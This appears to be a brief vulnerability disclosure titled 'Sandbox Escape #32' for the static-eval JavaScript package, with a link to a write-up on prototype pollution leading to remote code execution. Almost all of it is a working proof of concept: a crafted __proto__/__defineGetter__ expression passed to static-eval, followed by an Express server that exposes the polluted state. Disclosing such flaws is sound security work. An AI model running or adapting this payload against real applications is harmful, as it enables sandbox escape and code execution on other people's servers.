Sandbox Escape #32
Description
poc
// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;
var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`
var ast = parse(src).body[0].expression;
evaluate(ast);
// serve webapp
const express = require('express');
const app = express();
app.get('/', (req, res) => {
res.end('working!');
});
app.listen(8080);details in
https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution